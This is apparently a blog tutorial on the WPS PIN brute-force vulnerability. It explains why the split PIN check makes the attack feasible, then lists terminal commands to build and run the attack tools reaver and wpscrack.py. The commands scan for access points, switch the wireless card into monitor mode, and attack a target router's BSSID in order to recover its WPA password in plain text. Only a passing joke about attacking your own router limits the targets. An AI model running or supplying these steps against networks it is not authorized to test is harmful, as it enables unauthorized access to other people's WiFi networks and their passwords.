A flaw in WPS (WiFi Protected Setup), known to TNS for over a year, has now been demonstrated with proof-of-concept code. Both TNS, who discovered the flaw, and Stefan at .braindump have released their respective programs, "reaver" and "wpscrack", to exploit the WPS vulnerability. Once the attack on the access point's WPS has run its course, which normally takes 2-10 hours (depending on which program you use), the WPA password is handed over almost instantly in plain text.
This exploit defeats WPS with an intelligent brute-force attack against the static WPS PIN. When a PIN is guessed, the router reveals whether or not the first four digits (of eight) are correct on their own. The final digit is a checksum used to satisfy an algorithm, so it never needs to be guessed. Together these properties shrink the search space enough to brute-force the WPS PIN, and so recover the WPA password, in an incredibly short time compared with the standard attack on WPA.
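To see why the attack is so fast, here is the key-space arithmetic behind the paragraph above (an added derivation, not part of the original post; it assumes the standard WPS layout of an eight-digit PIN whose eighth digit is a checksum of the first seven):

\[
\begin{aligned}
\text{all eight-digit PINs: } & 10^8 \\
\text{PINs with a valid checksum (digit 8 fixed by digits 1 to 7): } & 10^7 \\
\text{first half confirmed on its own (digits 1 to 4): } & \le 10^4 \text{ guesses} \\
\text{second half (digits 5 to 7 free, digit 8 determined): } & \le 10^3 \text{ guesses} \\
\text{worst case with split verification: } & 10^4 + 10^3 = 11\,000 \ll 10^7
\end{aligned}
\]

On average about half of those guesses are needed, which is why the PIN falls in hours rather than in the years a full eight-digit search would take at the same rate.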
Let's go over how to use both tools to crack WPS. As yet no router is safe from this attack, and none of the vendors have reacted by releasing firmware with mitigations in place. Even disabling WPS still leaves most routers open to this attack.
Requirements
- Linux OS
- A router at home with WPS
- The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev
Tools
Crack WPS
Each step is followed by the terminal command to type, shown in `code`. Follow the guide that corresponds to the tool you chose to use below.
Reaver
- Extract the Reaver tarball (it is a .tar.gz, so use tar rather than unzip): `tar xzf reaver-1.3.tar.gz`
- Change to the Reaver directory: `cd reaver-1.3`
- Configure, compile and install the application: `./configure && make && sudo make install`
- Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX); iwlist takes the interface before the command: `sudo iwlist wlan0 scan`
- Set your device into monitor mode: `sudo airmon-ng start wlan0`
- Run the tool against an access point: `reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv`
- Wait until it finishes.
wpscrack.py
- Make the program executable: `chmod +x wpscrack.py`
- Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX): `sudo iwlist wlan0 scan`
- Get your own MAC address and save it for later: `ip link show wlan0 | awk '/ether/ {print $2}'`
- Set your device into monitor mode: `sudo airmon-ng start wlan0`
- Attack your AP (the options take two leading dashes, and the script is run from the current directory): `./wpscrack.py --iface mon0 --client <your MAC, because you're attacking yourself, right?> --bssid <AP MAC address> --ssid <name of your AP> -v`
- Await victory.